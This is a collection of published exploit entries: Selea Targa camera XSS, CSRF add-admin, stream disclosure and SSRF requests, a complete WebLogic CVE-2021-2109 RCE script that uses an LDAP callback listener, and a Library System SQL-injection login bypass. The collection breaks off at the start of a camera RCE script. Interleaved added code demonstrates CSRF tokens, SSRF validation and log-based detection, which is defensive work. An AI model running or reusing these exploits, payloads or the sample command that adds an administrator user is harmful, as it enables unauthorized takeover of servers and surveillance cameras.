                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The application suffers from a stored XSS through a POST request. The issue is triggered when input passed to the 'files_list' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd HttpServer/0.1
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5614
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php

07.11.2020

--

Remote Stored XSS:
------------------

POST /cgi-bin/get_file.php HTTP/1.1
Host: 192.168.1.17

name=Test&files_list=<marquee><h3>t00t</h3></marquee>

Unauthenticated Log Pollution Trigger XSS:
------------------------------------------

GET /get_log.php?type=system HTTP/1.1
Host: 192.168.1.17
-
Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
# Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd HttpServer/0.1
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5618
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php

07.11.2020

--

Add Admin:
----------

<html>
  <body>
  <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/192.168.1.17\/save_params.php", true);
      xhr.setRequestHeader("Accept", "*\/*");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=cfgboundary-----------------------1607475234133");
      xhr.withCredentials = true;
      var body = "--cfgboundary-----------------------1607475234133\r\n" +
        "Content-Disposition: form-data; name=\"set_params\"\r\n" +
        "\r\n" +
        "upload\r\n" +
        "--cfgboundary-----------------------1607475234133\r\n" +
        "Content-Disposition: form-data; name=\"user_file\"; filename=\"set_params.dat\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "[SECURITY.USERS]\r\n" +
        "security-users-0-username = testingus\r\n" +
        "security-users-0-password = testingus\r\n" +
        "security-users-0-rights = 2\r\n" +
        "security-users-1-username = \r\n" +
        "security-users-1-password = \r\n" +
        "security-users-1-rights = 0\r\n" +
        "security-users-2-username = \r\n" +
        "security-users-2-password = \r\n" +
        "security-users-2-rights = 0\r\n" +
        "security-users-3-username = \r\n" +
        "security-users-3-password = \r\n" +
        "security-users-3-rights = 0\r\n" +
        "security-allow_viewers_storage_access = 1\r\n" +
        "CFG_ROOTPASS = admin\r\n" +
        "\r\n" +
        "--cfgboundary-----------------------1607475234133--\r\n";
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
      xhr.send(new Blob([aBody]));
    }
  </script>
  <form action="#">
    <input type="button" value="Add Admin" onclick="submitRequest();" />
  </form>
  </body>
</html>
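Both CSRF entries on this page, the Anchor CMS user deletion over GET and the camera's `save_params.php` accepting a cross-origin POST with the victim's cookies, come down to the same two missing server-side controls: state changes must not be reachable by GET, and every state-changing request must carry a secret the attacker's page cannot know. The following is an added example of those controls and is not code from Anchor CMS, from the Targa firmware or from either advisory; the in-memory token store and the session identifiers are this example's own constructions.

```python
import hmac
import secrets

STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


class CsrfGuard:
    """Per-session anti-CSRF token store.

    A real deployment keeps the token in the server-side session; a dict keyed
    by session id is enough to demonstrate the checks."""

    def __init__(self):
        self._tokens = {}

    def issue(self, session_id):
        # One unguessable token per session. The application embeds it in its
        # own forms as a hidden field (or sends it as a custom header from its
        # own JavaScript); a page on another origin cannot read it.
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def authorize(self, session_id, method, submitted_token, is_state_change=True):
        """Return (allowed, reason) for one incoming request.

        is_state_change marks handlers that modify data (delete a user, save
        parameters). Those must never be reachable by a plain GET: an
        <img src=...> on an attacker's page is exactly such a GET, sent with
        the victim's cookies attached."""
        method = method.upper()
        if not is_state_change:
            return True, "read-only request"
        if method not in STATE_CHANGING_METHODS:
            return False, "state change over %s refused" % method
        expected = self._tokens.get(session_id)
        if expected is None or submitted_token is None:
            return False, "missing CSRF token"
        # Constant-time comparison, so the token cannot be recovered byte by
        # byte from response timing.
        if not hmac.compare_digest(expected, submitted_token):
            return False, "CSRF token mismatch"
        return True, "ok"


if __name__ == "__main__":
    guard = CsrfGuard()
    token = guard.issue("session-of-admin")
    # The Anchor CMS pattern: a cross-site <img> request with no token.
    print(guard.authorize("session-of-admin", "GET", None))
    # The camera pattern: a cross-origin POST carrying cookies but no token.
    print(guard.authorize("session-of-admin", "POST", None))
    # The application's own form submission.
    print(guard.authorize("session-of-admin", "POST", token))
```

The token check is what makes the multipart POST in the PoC above fail even though the browser attaches the session cookie: the attacker's page can build the body, but not the token. Marking the session cookie `SameSite=Lax` or `Strict` and comparing the `Origin` header against the application's own origin are complementary controls, not replacements, since older clients and some embedded browsers do not send either.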
-
Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)
# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure

Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model:    iZero
                            Targa 512
                            Targa 504
                            Targa Semplice
                            Targa 704 TKM
                            Targa 805
                            Targa 710 INOX
                            Targa 750
                            Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream disclosure when p1.mjpg or p1.264 is called.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd HttpServer/0.1
           SeleaCPSHttpServer/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5619
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php

07.11.2020

--

Connection to RTP/RTSP stream:

rtsp://192.168.1.17/p1.264

Connection to M-JPEG stream:

http://192.168.1.17/p1.mjpg
-
Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
# Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF


Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
                         Targa 512
                         Targa 504
                         Targa Semplice
                         Targa 704 TKM
                         Targa 805
                         Targa 710 INOX
                         Targa 750
                         Targa 704 ILB
                  Firmware: BLD201113005214
                            BLD201106163745
                            BLD200304170901
                            BLD200304170514
                            BLD200303143345
                            BLD191118145435
                            BLD191021180140
                            BLD191021180140
                  CPS: 4.013(201105)
                       3.100(200225)
                       3.005(191206)
                       3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.

Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
Selea ANPR camera within several functionalities. The application parses user supplied
data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image
request or check DNS for IP notification. Since no validation is carried out on the
parameters, an attacker can specify an external domain and force the application to
make an HTTP request to an arbitrary destination host. This can be used by an external
attacker for example to bypass firewalls and initiate a service and network enumeration
on the internal network through the affected application.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5617
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php


07.11.2020

--


Request:
--------

POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: 192.168.1.17

{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}

Response (port 80):
-------------------

{"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19}

Response (port 8080):
---------------------

{"code": 500,"error": "Error sending notification: Connection refused"}


Request:
--------

POST /cps/test_url HTTP/1.1
Host: 192.168.1.17

{"url":"http://127.0.0.1:80"}:

Response (port 80):
-------------------

{"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"}

Response (port 8081):
---------------------

{"elapsed_ms": 1,"error": "Connection refused"}
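The two requests above differ only in which JSON key carries the destination ('ipnotify_address' for test_backup_server, 'url' for test_url), and both reach loopback because the value is never checked. The following is an added example of the validation the advisory says is missing; it is not Selea firmware code and not part of the ZSL advisory. The blocked address ranges, the function names and the sample bodies are this example's own assumptions. It resolves every A/AAAA record of a hostname rather than only the first, and unwraps IPv4-mapped IPv6 literals, so that the loopback probe shown in the advisory is rejected in all of its spellings.

```python
# Added example (not Selea's code, not part of the advisory): validate the
# 'ipnotify_address' / 'url' destination before any outbound request is made.
import ipaddress
import json
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Address space a notification or image-fetch target must never resolve to:
# "this network", RFC 1918, CGNAT, loopback, link-local (which includes the
# 169.254.169.254 cloud metadata address), multicast, reserved, and the
# IPv6 equivalents. Assumed policy for this example.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]


def is_blocked_ip(ip_text):
    """True if the address (v4, v6 or v4-mapped v6) lies in a blocked range."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 is still loopback
    return any(ip in net for net in BLOCKED_NETWORKS)


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def resolve_all(host):
    """Default resolver: every A/AAAA record, since any one of them could be internal."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_destination(url, resolver=resolve_all):
    """
    Return (ok, reason). A destination is accepted only when the scheme is
    http/https, a host is present, and every address the host resolves to is
    outside BLOCKED_NETWORKS. Checking all records also covers hosts that
    mix public and internal records.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, "unparseable url: %s" % exc
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in url"
    try:
        addrs = [host] if _is_ip_literal(host) else resolver(host)
    except socket.gaierror:
        return False, "host does not resolve: %s" % host
    if not addrs:
        return False, "host does not resolve: %s" % host
    for addr in addrs:
        if is_blocked_ip(addr):
            return False, "host %s resolves to blocked address %s" % (host, addr)
    return True, "ok"


def check_notification_body(body, resolver=resolve_all):
    """
    Validate the JSON bodies seen in the advisory: test_backup_server carries
    'ipnotify_address', test_url carries 'url'. Returns (ok, reason).
    """
    try:
        data = json.loads(body)
    except ValueError:
        return False, "body is not valid JSON"
    target = data.get("ipnotify_address") or data.get("url")
    if not isinstance(target, str):
        return False, "no destination in body"
    return check_destination(target, resolver)


if __name__ == "__main__":
    # Constructed samples: the loopback probe from the advisory, then a host
    # that a stub resolver maps to a documentation-range (non-internal) address.
    print(check_notification_body('{"test_type":"ip","ipnotify_address":"http://127.0.0.1:80"}'))
    print(check_notification_body('{"url":"http://notify.example.net/hook"}',
                                  resolver=lambda h: ["203.0.113.5"]))
```

The resolver is injectable so the check can be unit-tested without DNS; in production the device would also want to connect to the exact address it validated (rather than re-resolving), otherwise a record that changes between the check and the request gets around the filter.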
-
Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''
    Copyright 2021 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    File name CVE-2021-2109.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)
    Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from https://github.com/welk1n/JNDI-Injection-Exploit
    to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None
## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''):
            self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''):
            self.stderr += line

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
            print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except:
        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult)

def checkParams(options, args):
    if args: sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
    if sHost[-1:] == '/': sHost = sHost[:-1]
    if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else:
        sUser = input('[?] Username [weblogic] : ')
        if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else:
        sPass = input('[?] Password [Passw0rd-] : ')
        if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else:
        sCMD = input('[?] Command to run [calc] : ')
        if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else:
        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
        if sLHOST == '': sLHOST = '192.168.0.10'
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        '  Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        '  in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
    )
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)

    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)

    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)

    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')

    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Successfully logged in!\n')
    else: exit('[-] Authentication Denied')

    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)

    ## This is the actual vulnerability: the victim retrieves LDAP data, which then runs on the victim.
    ## It bypasses the verification because the IP is written as "127.0.0;1" instead of "127.0.0.1"
    print('\n[+] Firing exploit now, hold on')
    ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: endIt()
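The request the script sends is a single GET to consolejndi.portal whose JndiBindingHandle carries an ldap:// URL with a ';' where the third dot of the listener IP should be. Both properties are visible in an ordinary access log, which makes this one of the easier WebLogic issues to hunt for retrospectively. The block below is an added detection example written for this page, not part of Photubias' script: it parses Combined Log Format lines (the three sample lines are constructed) and flags console JNDI requests whose binding handle names a remote lookup scheme, noting separately when the host part is not a plain IPv4 literal or hostname. The handle regex, the list of remote schemes and the finding format are this example's assumptions.

```python
# Added example (not part of the exploit above): flag CVE-2021-2109 style
# console requests in web-server access logs. Sample log lines are constructed.
import re
from urllib.parse import unquote

# JndiBindingHandle("<scheme>://<host>...") inside a consolejndi.portal request.
# The host is captured up to ':' or '/', so the "192.168.0;10" spelling
# (a ';' where a '.' belongs) stays intact in the capture.
HANDLE_RE = re.compile(
    r'JndiBindingHandle\(\s*"?(?P<scheme>[a-z][a-z0-9+.-]*)://(?P<host>[^:/"]+)',
    re.IGNORECASE)

# JNDI providers that make the server reach out to a foreign host (assumed list).
REMOTE_SCHEMES = {"ldap", "ldaps", "rmi", "iiop", "corbaname"}

# Combined/Common Log Format: client, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def inspect_request(path):
    """
    Return a finding dict for one request path, or None when nothing is wrong.
    A finding is raised when the binding handle points at a remote JNDI
    provider, or when its host part contains characters outside an IPv4
    literal / hostname (such as ';').
    """
    decoded = unquote(path)
    if "consolejndi.portal" not in decoded:
        return None
    m = HANDLE_RE.search(decoded)
    if not m:
        return None
    scheme, host = m.group("scheme").lower(), m.group("host")
    remote = scheme in REMOTE_SCHEMES
    malformed = re.fullmatch(r"[A-Za-z0-9.-]+", host) is None
    if not (remote or malformed):
        return None
    return {"scheme": scheme, "host": host, "remote_lookup": remote, "malformed_host": malformed}


def scan_access_log(lines):
    """Return a list of (client_ip, status, finding) for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m.group("path"))
        if finding:
            hits.append((m.group("ip"), m.group("status"), finding))
    return hits


# Constructed sample: a login, the exploit request shape, and a benign
# console request that binds a local JDBC name and must not be flagged.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Jan/2021:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1234',
    '198.51.100.7 - - [21/Jan/2021:10:00:09 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.0;10:1389/5r5mu7;AdminServer%22) HTTP/1.1" 200 5678',
    '10.0.0.3 - - [21/Jan/2021:10:01:00 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22jdbc/MyDS;AdminServer%22) HTTP/1.1" 200 4321',
]

if __name__ == "__main__":
    for ip, status, finding in scan_access_log(SAMPLE_LOG):
        print(ip, status, finding)
```

Because the console requires an authenticated session, each hit also names the account that was logged in at that time, which is the pivot an incident responder needs next; the status code is kept because the exploit request returns 200 whether or not the lookup succeeded, so the listener side (the JAR's own log) is what confirms impact.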
-
Library System 1.0 - Authentication Bypass
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection

#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnerable Application. For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.

import requests

YELLOW = '\033[33m'  # Yellow Text
GREEN = '\033[32m'   # Green Text
RED = '\033[31m'     # Red Text
RESET = '\033[m'     # reset to the defaults

print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('**                 LIBRARY SYSTEM 1.0                 **')
print('**      AUTHENTICATION BYPASS USING SQL INJECTION     **')
print('********************************************************')
print('Author - Himanshu Shukla')

#Create a new session
s = requests.Session()

#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}

LINK=input("Enter URL of The Vulnerable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)

#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
    print(GREEN+"[+]Authentication Bypass Successful!", RESET)
    print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
    print(RED+"[-]Failed To Authenticate!", RESET)
-
Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model: iZero
